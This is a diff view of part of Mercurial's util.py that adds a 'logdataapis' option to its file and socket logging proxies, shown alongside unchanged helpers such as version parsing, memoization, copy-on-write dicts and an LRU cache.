601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readlines', *args, **kwargs)
603 603
604 604 def seek(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'seek', *args, **kwargs)
607 607
608 608 def seekable(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seekable', *args, **kwargs)
611 611
612 612 def tell(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'tell', *args, **kwargs)
615 615
616 616 def truncate(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'truncate', *args, **kwargs)
619 619
620 620 def writable(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'writable', *args, **kwargs)
623 623
624 624 def writelines(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writelines', *args, **kwargs)
627 627
628 628 def read(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'read', *args, **kwargs)
631 631
632 632 def readall(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'readall', *args, **kwargs)
635 635
636 636 def readinto(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readinto', *args, **kwargs)
639 639
640 640 def write(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'write', *args, **kwargs)
643 643
644 644 def detach(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'detach', *args, **kwargs)
647 647
648 648 def read1(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'read1', *args, **kwargs)
651 651
652 652 class observedbufferedinputpipe(bufferedinputpipe):
653 653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654 654
655 655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 656 bypass ``fileobjectproxy``. Because of this, we need to make
657 657 ``bufferedinputpipe`` aware of these operations.
658 658
659 659 This variation of ``bufferedinputpipe`` can notify observers about
660 660 ``os.read()`` events. It also re-publishes other events, such as
661 661 ``read()`` and ``readline()``.
662 662 """
663 663 def _fillbuffer(self):
664 664 res = super(observedbufferedinputpipe, self)._fillbuffer()
665 665
666 666 fn = getattr(self._input._observer, r'osread', None)
667 667 if fn:
668 668 fn(res, _chunksize)
669 669
670 670 return res
671 671
672 672 # We use different observer methods because the operation isn't
673 673 # performed on the actual file object but on us.
674 674 def read(self, size):
675 675 res = super(observedbufferedinputpipe, self).read(size)
676 676
677 677 fn = getattr(self._input._observer, r'bufferedread', None)
678 678 if fn:
679 679 fn(res, size)
680 680
681 681 return res
682 682
683 683 def readline(self, *args, **kwargs):
684 684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685 685
686 686 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 687 if fn:
688 688 fn(res)
689 689
690 690 return res
691 691
692 692 PROXIED_SOCKET_METHODS = {
693 693 r'makefile',
694 694 r'recv',
695 695 r'recvfrom',
696 696 r'recvfrom_into',
697 697 r'recv_into',
698 698 r'send',
699 699 r'sendall',
700 700 r'sendto',
701 701 r'setblocking',
702 702 r'settimeout',
703 703 r'gettimeout',
704 704 r'setsockopt',
705 705 }
706 706
707 707 class socketproxy(object):
708 708 """A proxy around a socket that tells a watcher when events occur.
709 709
710 710 This is like ``fileobjectproxy`` except for sockets.
711 711
712 712 This type is intended to only be used for testing purposes. Think hard
713 713 before using it in important code.
714 714 """
715 715 __slots__ = (
716 716 r'_orig',
717 717 r'_observer',
718 718 )
719 719
720 720 def __init__(self, sock, observer):
721 721 object.__setattr__(self, r'_orig', sock)
722 722 object.__setattr__(self, r'_observer', observer)
723 723
724 724 def __getattribute__(self, name):
725 725 if name in PROXIED_SOCKET_METHODS:
726 726 return object.__getattribute__(self, name)
727 727
728 728 return getattr(object.__getattribute__(self, r'_orig'), name)
729 729
730 730 def __delattr__(self, name):
731 731 return delattr(object.__getattribute__(self, r'_orig'), name)
732 732
733 733 def __setattr__(self, name, value):
734 734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735 735
736 736 def __nonzero__(self):
737 737 return bool(object.__getattribute__(self, r'_orig'))
738 738
739 739 __bool__ = __nonzero__
740 740
741 741 def _observedcall(self, name, *args, **kwargs):
742 742 # Call the original object.
743 743 orig = object.__getattribute__(self, r'_orig')
744 744 res = getattr(orig, name)(*args, **kwargs)
745 745
746 746 # Call a method on the observer of the same name with arguments
747 747 # so it can react, log, etc.
748 748 observer = object.__getattribute__(self, r'_observer')
749 749 fn = getattr(observer, name, None)
750 750 if fn:
751 751 fn(res, *args, **kwargs)
752 752
753 753 return res
754 754
755 755 def makefile(self, *args, **kwargs):
756 756 res = object.__getattribute__(self, r'_observedcall')(
757 757 r'makefile', *args, **kwargs)
758 758
759 759 # The file object may be used for I/O. So we turn it into a
760 760 # proxy using our observer.
761 761 observer = object.__getattribute__(self, r'_observer')
762 762 return makeloggingfileobject(observer.fh, res, observer.name,
763 763 reads=observer.reads,
764 764 writes=observer.writes,
765 logdata=observer.logdata)
765 logdata=observer.logdata,
766 logdataapis=observer.logdataapis)
766 767
767 768 def recv(self, *args, **kwargs):
768 769 return object.__getattribute__(self, r'_observedcall')(
769 770 r'recv', *args, **kwargs)
770 771
771 772 def recvfrom(self, *args, **kwargs):
772 773 return object.__getattribute__(self, r'_observedcall')(
773 774 r'recvfrom', *args, **kwargs)
774 775
775 776 def recvfrom_into(self, *args, **kwargs):
776 777 return object.__getattribute__(self, r'_observedcall')(
777 778 r'recvfrom_into', *args, **kwargs)
778 779
779 780 def recv_into(self, *args, **kwargs):
780 781 return object.__getattribute__(self, r'_observedcall')(
781 782 r'recv_into', *args, **kwargs)
782 783
783 784 def send(self, *args, **kwargs):
784 785 return object.__getattribute__(self, r'_observedcall')(
785 786 r'send', *args, **kwargs)
786 787
787 788 def sendall(self, *args, **kwargs):
788 789 return object.__getattribute__(self, r'_observedcall')(
789 790 r'sendall', *args, **kwargs)
790 791
791 792 def sendto(self, *args, **kwargs):
792 793 return object.__getattribute__(self, r'_observedcall')(
793 794 r'sendto', *args, **kwargs)
794 795
795 796 def setblocking(self, *args, **kwargs):
796 797 return object.__getattribute__(self, r'_observedcall')(
797 798 r'setblocking', *args, **kwargs)
798 799
799 800 def settimeout(self, *args, **kwargs):
800 801 return object.__getattribute__(self, r'_observedcall')(
801 802 r'settimeout', *args, **kwargs)
802 803
803 804 def gettimeout(self, *args, **kwargs):
804 805 return object.__getattribute__(self, r'_observedcall')(
805 806 r'gettimeout', *args, **kwargs)
806 807
807 808 def setsockopt(self, *args, **kwargs):
808 809 return object.__getattribute__(self, r'_observedcall')(
809 810 r'setsockopt', *args, **kwargs)
810 811
811 812 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
812 813 DATA_ESCAPE_MAP.update({
813 814 b'\\': b'\\\\',
814 815 b'\r': br'\r',
815 816 b'\n': br'\n',
816 817 })
817 818 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
818 819
819 820 def escapedata(s):
820 821 if isinstance(s, bytearray):
821 822 s = bytes(s)
822 823
823 824 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
824 825
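# Editor's illustration (derived from the map above, not in the original):
# printable bytes pass through while control, backslash, and high-bit
# bytes are escaped.
#
#   >>> escapedata(b'ping\r\n\x00ok')
#   'ping\\r\\n\\x00ok'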
825 826 class baseproxyobserver(object):
826 827 def _writedata(self, data):
827 828 if not self.logdata:
828 self.fh.write('\n')
829 self.fh.flush()
829 if self.logdataapis:
830 self.fh.write('\n')
831 self.fh.flush()
830 832 return
831 833
832 834 # Simple case writes all data on a single line.
833 835 if b'\n' not in data:
834 self.fh.write(': %s\n' % escapedata(data))
836 if self.logdataapis:
837 self.fh.write(': %s\n' % escapedata(data))
838 else:
839 self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
835 840 self.fh.flush()
836 841 return
837 842
838 843 # Data with newlines is written to multiple lines.
839 self.fh.write(':\n')
844 if self.logdataapis:
845 self.fh.write(':\n')
846
840 847 lines = data.splitlines(True)
841 848 for line in lines:
842 849 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
843 850 self.fh.flush()
844 851
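# Editor's sketch (not in the original) of the log shapes ``_writedata`` and
# the observers below produce for a read of b'ping' on a hypothetical handle
# named "o":
#
#   logdataapis=True,  logdata=False  ->  o> read(4) -> 4
#   logdataapis=True,  logdata=True   ->  o> read(4) -> 4: ping
#   logdataapis=False, logdata=True   ->  o> ping
#
# i.e. ``logdataapis`` gates the "api(args) -> result" line while
# ``logdata`` gates the payload dump.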
845 852 class fileobjectobserver(baseproxyobserver):
846 853 """Logs file object activity."""
847 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
854 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
855 logdataapis=True):
848 856 self.fh = fh
849 857 self.name = name
850 858 self.logdata = logdata
859 self.logdataapis = logdataapis
851 860 self.reads = reads
852 861 self.writes = writes
853 862
854 863 def read(self, res, size=-1):
855 864 if not self.reads:
856 865 return
857 866 # Python 3 can return None from reads at EOF instead of empty strings.
858 867 if res is None:
859 868 res = ''
860 869
861 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
870 if self.logdataapis:
871 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
872
862 873 self._writedata(res)
863 874
864 875 def readline(self, res, limit=-1):
865 876 if not self.reads:
866 877 return
867 878
868 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
879 if self.logdataapis:
880 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
881
869 882 self._writedata(res)
870 883
871 884 def readinto(self, res, dest):
872 885 if not self.reads:
873 886 return
874 887
875 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
876 res))
888 if self.logdataapis:
889 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
890 res))
891
877 892 data = dest[0:res] if res is not None else b''
878 893 self._writedata(data)
879 894
880 895 def write(self, res, data):
881 896 if not self.writes:
882 897 return
883 898
884 899 # Python 2 returns None from some write() calls. Python 3 (reasonably)
885 900 # returns the number of bytes written.
886 901 if res is None and data:
887 902 res = len(data)
888 903
889 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
904 if self.logdataapis:
905 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
906
890 907 self._writedata(data)
891 908
892 909 def flush(self, res):
893 910 if not self.writes:
894 911 return
895 912
896 913 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
897 914
898 915 # For observedbufferedinputpipe.
899 916 def bufferedread(self, res, size):
900 self.fh.write('%s> bufferedread(%d) -> %d' % (
901 self.name, size, len(res)))
917 if not self.reads:
918 return
919
920 if self.logdataapis:
921 self.fh.write('%s> bufferedread(%d) -> %d' % (
922 self.name, size, len(res)))
923
902 924 self._writedata(res)
903 925
904 926 def bufferedreadline(self, res):
905 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
927 if not self.reads:
928 return
929
930 if self.logdataapis:
931 self.fh.write('%s> bufferedreadline() -> %d' % (
932 self.name, len(res)))
933
906 934 self._writedata(res)
907 935
908 936 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
909 logdata=False):
937 logdata=False, logdataapis=True):
910 938 """Turn a file object into a logging file object."""
911 939
912 940 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
913 logdata=logdata)
941 logdata=logdata, logdataapis=logdataapis)
914 942 return fileobjectproxy(fh, observer)
915 943
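# Editor's usage sketch (hypothetical objects):
#
#   import io
#   log = io.BytesIO()
#   fh = makeloggingfileobject(log, io.BytesIO(b'ping'), 'o',
#                              logdata=True, logdataapis=False)
#   fh.read(4)
#   # log now holds "o> ping\n" rather than the "o> read(4) -> 4: ping"
#   # form that logdataapis=True would give.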
916 944 class socketobserver(baseproxyobserver):
917 945 """Logs socket activity."""
918 946 def __init__(self, fh, name, reads=True, writes=True, states=True,
919 logdata=False):
947 logdata=False, logdataapis=True):
920 948 self.fh = fh
921 949 self.name = name
922 950 self.reads = reads
923 951 self.writes = writes
924 952 self.states = states
925 953 self.logdata = logdata
954 self.logdataapis = logdataapis
926 955
927 956 def makefile(self, res, mode=None, bufsize=None):
928 957 if not self.states:
929 958 return
930 959
931 960 self.fh.write('%s> makefile(%r, %r)\n' % (
932 961 self.name, mode, bufsize))
933 962
934 963 def recv(self, res, size, flags=0):
935 964 if not self.reads:
936 965 return
937 966
938 self.fh.write('%s> recv(%d, %d) -> %d' % (
939 self.name, size, flags, len(res)))
967 if self.logdataapis:
968 self.fh.write('%s> recv(%d, %d) -> %d' % (
969 self.name, size, flags, len(res)))
940 970 self._writedata(res)
941 971
942 972 def recvfrom(self, res, size, flags=0):
943 973 if not self.reads:
944 974 return
945 975
946 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
947 self.name, size, flags, len(res[0])))
976 if self.logdataapis:
977 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
978 self.name, size, flags, len(res[0])))
979
948 980 self._writedata(res[0])
949 981
950 982 def recvfrom_into(self, res, buf, size, flags=0):
951 983 if not self.reads:
952 984 return
953 985
954 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
955 self.name, size, flags, res[0]))
986 if self.logdataapis:
987 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
988 self.name, size, flags, res[0]))
989
956 990 self._writedata(buf[0:res[0]])
957 991
958 992 def recv_into(self, res, buf, size=0, flags=0):
959 993 if not self.reads:
960 994 return
961 995
962 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
963 self.name, size, flags, res))
996 if self.logdataapis:
997 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
998 self.name, size, flags, res))
999
964 1000 self._writedata(buf[0:res])
965 1001
966 1002 def send(self, res, data, flags=0):
967 1003 if not self.writes:
968 1004 return
969 1005
970 1006 self.fh.write('%s> send(%d, %d) -> %d' % (
971 1007 self.name, len(data), flags, res))
972 1008 self._writedata(data)
973 1009
974 1010 def sendall(self, res, data, flags=0):
975 1011 if not self.writes:
976 1012 return
977 1013
978 # Returns None on success. So don't bother reporting return value.
979 self.fh.write('%s> sendall(%d, %d)' % (
980 self.name, len(data), flags))
1014 if self.logdataapis:
1015 # Returns None on success. So don't bother reporting return value.
1016 self.fh.write('%s> sendall(%d, %d)' % (
1017 self.name, len(data), flags))
1018
981 1019 self._writedata(data)
982 1020
983 1021 def sendto(self, res, data, flagsoraddress, address=None):
984 1022 if not self.writes:
985 1023 return
986 1024
987 1025 if address:
988 1026 flags = flagsoraddress
989 1027 else:
990 1028 flags = 0
991 1029
992 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
993 self.name, len(data), flags, address, res))
1030 if self.logdataapis:
1031 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1032 self.name, len(data), flags, address, res))
1033
994 1034 self._writedata(data)
995 1035
996 1036 def setblocking(self, res, flag):
997 1037 if not self.states:
998 1038 return
999 1039
1000 1040 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1001 1041
1002 1042 def settimeout(self, res, value):
1003 1043 if not self.states:
1004 1044 return
1005 1045
1006 1046 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1007 1047
1008 1048 def gettimeout(self, res):
1009 1049 if not self.states:
1010 1050 return
1011 1051
1012 1052 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1013 1053
1014 1054 def setsockopt(self, res, level, optname, value):
1015 1055 if not self.states:
1016 1056 return
1017 1057
1018 1058 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1019 1059 self.name, level, optname, value, res))
1020 1060
1021 1061 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1022 logdata=False):
1062 logdata=False, logdataapis=True):
1023 1063 """Turn a socket into a logging socket."""
1024 1064
1025 1065 observer = socketobserver(logh, name, reads=reads, writes=writes,
1026 states=states, logdata=logdata)
1066 states=states, logdata=logdata,
1067 logdataapis=logdataapis)
1027 1068 return socketproxy(fh, observer)
1028 1069
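# Editor's note: ``logdataapis=False`` is the knob this change adds so a
# caller (per the commit message, the HTTP peer) can keep the payload dumps
# while dropping the per-call recv()/send() lines. Hypothetical sketch:
#
#   sock = makeloggingsocket(ui.ferr, rawsock, 'c',
#                            logdata=True, logdataapis=False)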
1029 1070 def version():
1030 1071 """Return version information if available."""
1031 1072 try:
1032 1073 from . import __version__
1033 1074 return __version__.version
1034 1075 except ImportError:
1035 1076 return 'unknown'
1036 1077
1037 1078 def versiontuple(v=None, n=4):
1038 1079 """Parses a Mercurial version string into an N-tuple.
1039 1080
1040 1081 The version string to be parsed is specified with the ``v`` argument.
1041 1082 If it isn't defined, the current Mercurial version string will be parsed.
1042 1083
1043 1084 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1044 1085 returned values:
1045 1086
1046 1087 >>> v = b'3.6.1+190-df9b73d2d444'
1047 1088 >>> versiontuple(v, 2)
1048 1089 (3, 6)
1049 1090 >>> versiontuple(v, 3)
1050 1091 (3, 6, 1)
1051 1092 >>> versiontuple(v, 4)
1052 1093 (3, 6, 1, '190-df9b73d2d444')
1053 1094
1054 1095 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1055 1096 (3, 6, 1, '190-df9b73d2d444+20151118')
1056 1097
1057 1098 >>> v = b'3.6'
1058 1099 >>> versiontuple(v, 2)
1059 1100 (3, 6)
1060 1101 >>> versiontuple(v, 3)
1061 1102 (3, 6, None)
1062 1103 >>> versiontuple(v, 4)
1063 1104 (3, 6, None, None)
1064 1105
1065 1106 >>> v = b'3.9-rc'
1066 1107 >>> versiontuple(v, 2)
1067 1108 (3, 9)
1068 1109 >>> versiontuple(v, 3)
1069 1110 (3, 9, None)
1070 1111 >>> versiontuple(v, 4)
1071 1112 (3, 9, None, 'rc')
1072 1113
1073 1114 >>> v = b'3.9-rc+2-02a8fea4289b'
1074 1115 >>> versiontuple(v, 2)
1075 1116 (3, 9)
1076 1117 >>> versiontuple(v, 3)
1077 1118 (3, 9, None)
1078 1119 >>> versiontuple(v, 4)
1079 1120 (3, 9, None, 'rc+2-02a8fea4289b')
1080 1121 """
1081 1122 if not v:
1082 1123 v = version()
1083 1124 parts = remod.split(br'[\+-]', v, 1)
1084 1125 if len(parts) == 1:
1085 1126 vparts, extra = parts[0], None
1086 1127 else:
1087 1128 vparts, extra = parts
1088 1129
1089 1130 vints = []
1090 1131 for i in vparts.split('.'):
1091 1132 try:
1092 1133 vints.append(int(i))
1093 1134 except ValueError:
1094 1135 break
1095 1136 # (3, 6) -> (3, 6, None)
1096 1137 while len(vints) < 3:
1097 1138 vints.append(None)
1098 1139
1099 1140 if n == 2:
1100 1141 return (vints[0], vints[1])
1101 1142 if n == 3:
1102 1143 return (vints[0], vints[1], vints[2])
1103 1144 if n == 4:
1104 1145 return (vints[0], vints[1], vints[2], extra)
1105 1146
1106 1147 def cachefunc(func):
1107 1148 '''cache the result of function calls'''
1108 1149 # XXX doesn't handle keyword args
1109 1150 if func.__code__.co_argcount == 0:
1110 1151 cache = []
1111 1152 def f():
1112 1153 if len(cache) == 0:
1113 1154 cache.append(func())
1114 1155 return cache[0]
1115 1156 return f
1116 1157 cache = {}
1117 1158 if func.__code__.co_argcount == 1:
1118 1159 # we gain a small amount of time because
1119 1160 # we don't need to pack/unpack the list
1120 1161 def f(arg):
1121 1162 if arg not in cache:
1122 1163 cache[arg] = func(arg)
1123 1164 return cache[arg]
1124 1165 else:
1125 1166 def f(*args):
1126 1167 if args not in cache:
1127 1168 cache[args] = func(*args)
1128 1169 return cache[args]
1129 1170
1130 1171 return f
1131 1172
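# Editor's sketch (hypothetical function): cachefunc memoizes on positional
# arguments, so recursive calls hit the cache.
#
#   fib = cachefunc(lambda n: n if n < 2 else fib(n - 1) + fib(n - 2))
#   fib(30)  # linear number of underlying evaluations thanks to the cache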
1132 1173 class cow(object):
1133 1174 """helper class to make copy-on-write easier
1134 1175
1135 1176 Call preparewrite before doing any writes.
1136 1177 """
1137 1178
1138 1179 def preparewrite(self):
1139 1180 """call this before writes, return self or a copied new object"""
1140 1181 if getattr(self, '_copied', 0):
1141 1182 self._copied -= 1
1142 1183 return self.__class__(self)
1143 1184 return self
1144 1185
1145 1186 def copy(self):
1146 1187 """always do a cheap copy"""
1147 1188 self._copied = getattr(self, '_copied', 0) + 1
1148 1189 return self
1149 1190
1150 1191 class sortdict(collections.OrderedDict):
1151 1192 '''a simple sorted dictionary
1152 1193
1153 1194 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1154 1195 >>> d2 = d1.copy()
1155 1196 >>> d2
1156 1197 sortdict([('a', 0), ('b', 1)])
1157 1198 >>> d2.update([(b'a', 2)])
1158 1199 >>> list(d2.keys()) # should still be in last-set order
1159 1200 ['b', 'a']
1160 1201 '''
1161 1202
1162 1203 def __setitem__(self, key, value):
1163 1204 if key in self:
1164 1205 del self[key]
1165 1206 super(sortdict, self).__setitem__(key, value)
1166 1207
1167 1208 if pycompat.ispypy:
1168 1209 # __setitem__() isn't called as of PyPy 5.8.0
1169 1210 def update(self, src):
1170 1211 if isinstance(src, dict):
1171 1212 src = src.iteritems()
1172 1213 for k, v in src:
1173 1214 self[k] = v
1174 1215
1175 1216 class cowdict(cow, dict):
1176 1217 """copy-on-write dict
1177 1218
1178 1219 Be sure to call d = d.preparewrite() before writing to d.
1179 1220
1180 1221 >>> a = cowdict()
1181 1222 >>> a is a.preparewrite()
1182 1223 True
1183 1224 >>> b = a.copy()
1184 1225 >>> b is a
1185 1226 True
1186 1227 >>> c = b.copy()
1187 1228 >>> c is a
1188 1229 True
1189 1230 >>> a = a.preparewrite()
1190 1231 >>> b is a
1191 1232 False
1192 1233 >>> a is a.preparewrite()
1193 1234 True
1194 1235 >>> c = c.preparewrite()
1195 1236 >>> b is c
1196 1237 False
1197 1238 >>> b is b.preparewrite()
1198 1239 True
1199 1240 """
1200 1241
1201 1242 class cowsortdict(cow, sortdict):
1202 1243 """copy-on-write sortdict
1203 1244
1204 1245 Be sure to call d = d.preparewrite() before writing to d.
1205 1246 """
1206 1247
1207 1248 class transactional(object):
1208 1249 """Base class for making a transactional type into a context manager."""
1209 1250 __metaclass__ = abc.ABCMeta
1210 1251
1211 1252 @abc.abstractmethod
1212 1253 def close(self):
1213 1254 """Successfully closes the transaction."""
1214 1255
1215 1256 @abc.abstractmethod
1216 1257 def release(self):
1217 1258 """Marks the end of the transaction.
1218 1259
1219 1260 If the transaction has not been closed, it will be aborted.
1220 1261 """
1221 1262
1222 1263 def __enter__(self):
1223 1264 return self
1224 1265
1225 1266 def __exit__(self, exc_type, exc_val, exc_tb):
1226 1267 try:
1227 1268 if exc_type is None:
1228 1269 self.close()
1229 1270 finally:
1230 1271 self.release()
1231 1272
1232 1273 @contextlib.contextmanager
1233 1274 def acceptintervention(tr=None):
1234 1275 """A context manager that closes the transaction on InterventionRequired
1235 1276
1236 1277 If no transaction was provided, this simply runs the body and returns
1237 1278 """
1238 1279 if not tr:
1239 1280 yield
1240 1281 return
1241 1282 try:
1242 1283 yield
1243 1284 tr.close()
1244 1285 except error.InterventionRequired:
1245 1286 tr.close()
1246 1287 raise
1247 1288 finally:
1248 1289 tr.release()
1249 1290
1250 1291 @contextlib.contextmanager
1251 1292 def nullcontextmanager():
1252 1293 yield
1253 1294
1254 1295 class _lrucachenode(object):
1255 1296 """A node in a doubly linked list.
1256 1297
1257 1298 Holds a reference to nodes on either side as well as a key-value
1258 1299 pair for the dictionary entry.
1259 1300 """
1260 1301 __slots__ = (u'next', u'prev', u'key', u'value')
1261 1302
1262 1303 def __init__(self):
1263 1304 self.next = None
1264 1305 self.prev = None
1265 1306
1266 1307 self.key = _notset
1267 1308 self.value = None
1268 1309
1269 1310 def markempty(self):
1270 1311 """Mark the node as emptied."""
1271 1312 self.key = _notset
1272 1313
1273 1314 class lrucachedict(object):
1274 1315 """Dict that caches most recent accesses and sets.
1275 1316
1276 1317 The dict consists of an actual backing dict - indexed by original
1277 1318 key - and a doubly linked circular list defining the order of entries in
1278 1319 the cache.
1279 1320
1280 1321 The head node is the newest entry in the cache. If the cache is full,
1281 1322 we recycle head.prev and make it the new head. Cache accesses result in
1282 1323 the node being moved to before the existing head and being marked as the
1283 1324 new head node.
1284 1325 """
1285 1326 def __init__(self, max):
1286 1327 self._cache = {}
1287 1328
1288 1329 self._head = head = _lrucachenode()
1289 1330 head.prev = head
1290 1331 head.next = head
1291 1332 self._size = 1
1292 1333 self._capacity = max
1293 1334
1294 1335 def __len__(self):
1295 1336 return len(self._cache)
1296 1337
1297 1338 def __contains__(self, k):
1298 1339 return k in self._cache
1299 1340
1300 1341 def __iter__(self):
1301 1342 # We don't have to iterate in cache order, but why not.
1302 1343 n = self._head
1303 1344 for i in range(len(self._cache)):
1304 1345 yield n.key
1305 1346 n = n.next
1306 1347
1307 1348 def __getitem__(self, k):
1308 1349 node = self._cache[k]
1309 1350 self._movetohead(node)
1310 1351 return node.value
1311 1352
1312 1353 def __setitem__(self, k, v):
1313 1354 node = self._cache.get(k)
1314 1355 # Replace existing value and mark as newest.
1315 1356 if node is not None:
1316 1357 node.value = v
1317 1358 self._movetohead(node)
1318 1359 return
1319 1360
1320 1361 if self._size < self._capacity:
1321 1362 node = self._addcapacity()
1322 1363 else:
1323 1364 # Grab the last/oldest item.
1324 1365 node = self._head.prev
1325 1366
1326 1367 # At capacity. Kill the old entry.
1327 1368 if node.key is not _notset:
1328 1369 del self._cache[node.key]
1329 1370
1330 1371 node.key = k
1331 1372 node.value = v
1332 1373 self._cache[k] = node
1333 1374 # And mark it as newest entry. No need to adjust order since it
1334 1375 # is already self._head.prev.
1335 1376 self._head = node
1336 1377
1337 1378 def __delitem__(self, k):
1338 1379 node = self._cache.pop(k)
1339 1380 node.markempty()
1340 1381
1341 1382 # Temporarily mark as newest item before re-adjusting head to make
1342 1383 # this node the oldest item.
1343 1384 self._movetohead(node)
1344 1385 self._head = node.next
1345 1386
1346 1387 # Additional dict methods.
1347 1388
1348 1389 def get(self, k, default=None):
1349 1390 try:
1350 1391 return self._cache[k].value
1351 1392 except KeyError:
1352 1393 return default
1353 1394
1354 1395 def clear(self):
1355 1396 n = self._head
1356 1397 while n.key is not _notset:
1357 1398 n.markempty()
1358 1399 n = n.next
1359 1400
1360 1401 self._cache.clear()
1361 1402
1362 1403 def copy(self):
1363 1404 result = lrucachedict(self._capacity)
1364 1405 n = self._head.prev
1365 1406 # Iterate in oldest-to-newest order, so the copy has the right ordering
1366 1407 for i in range(len(self._cache)):
1367 1408 result[n.key] = n.value
1368 1409 n = n.prev
1369 1410 return result
1370 1411
1371 1412 def _movetohead(self, node):
1372 1413 """Mark a node as the newest, making it the new head.
1373 1414
1374 1415 When a node is accessed, it becomes the freshest entry in the LRU
1375 1416 list, which is denoted by self._head.
1376 1417
1377 1418 Visually, let's make ``N`` the new head node (* denotes head):
1378 1419
1379 1420 previous/oldest <-> head <-> next/next newest
1380 1421
1381 1422 ----<->--- A* ---<->-----
1382 1423 | |
1383 1424 E <-> D <-> N <-> C <-> B
1384 1425
1385 1426 To:
1386 1427
1387 1428 ----<->--- N* ---<->-----
1388 1429 | |
1389 1430 E <-> D <-> C <-> B <-> A
1390 1431
1391 1432 This requires the following moves:
1392 1433
1393 1434 C.next = D (node.prev.next = node.next)
1394 1435 D.prev = C (node.next.prev = node.prev)
1395 1436 E.next = N (head.prev.next = node)
1396 1437 N.prev = E (node.prev = head.prev)
1397 1438 N.next = A (node.next = head)
1398 1439 A.prev = N (head.prev = node)
1399 1440 """
1400 1441 head = self._head
1401 1442 # C.next = D
1402 1443 node.prev.next = node.next
1403 1444 # D.prev = C
1404 1445 node.next.prev = node.prev
1405 1446 # N.prev = E
1406 1447 node.prev = head.prev
1407 1448 # N.next = A
1408 1449 # It is tempting to do just "head" here, however if node is
1409 1450 # adjacent to head, this will do bad things.
1410 1451 node.next = head.prev.next
1411 1452 # E.next = N
1412 1453 node.next.prev = node
1413 1454 # A.prev = N
1414 1455 node.prev.next = node
1415 1456
1416 1457 self._head = node
1417 1458
1418 1459 def _addcapacity(self):
1419 1460 """Add a node to the circular linked list.
1420 1461
1421 1462 The new node is inserted before the head node.
1422 1463 """
1423 1464 head = self._head
1424 1465 node = _lrucachenode()
1425 1466 head.prev.next = node
1426 1467 node.prev = head.prev
1427 1468 node.next = head
1428 1469 head.prev = node
1429 1470 self._size += 1
1430 1471 return node
1431 1472
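# Editor's sketch of the eviction order implied by the class above
# (illustrative, not in the original):
#
#   d = lrucachedict(2)
#   d['a'] = 1
#   d['b'] = 2
#   d['a']       # touching 'a' makes it the newest entry
#   d['c'] = 3   # at capacity: 'b', now the oldest, is evicted
#   assert 'b' not in d and 'a' in d and 'c' in d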
1432 1473 def lrucachefunc(func):
1433 1474 '''cache most recent results of function calls'''
1434 1475 cache = {}
1435 1476 order = collections.deque()
1436 1477 if func.__code__.co_argcount == 1:
1437 1478 def f(arg):
1438 1479 if arg not in cache:
1439 1480 if len(cache) > 20:
1440 1481 del cache[order.popleft()]
1441 1482 cache[arg] = func(arg)
1442 1483 else:
1443 1484 order.remove(arg)
1444 1485 order.append(arg)
1445 1486 return cache[arg]
1446 1487 else:
1447 1488 def f(*args):
1448 1489 if args not in cache:
1449 1490 if len(cache) > 20:
1450 1491 del cache[order.popleft()]
1451 1492 cache[args] = func(*args)
1452 1493 else:
1453 1494 order.remove(args)
1454 1495 order.append(args)
1455 1496 return cache[args]
1456 1497
1457 1498 return f
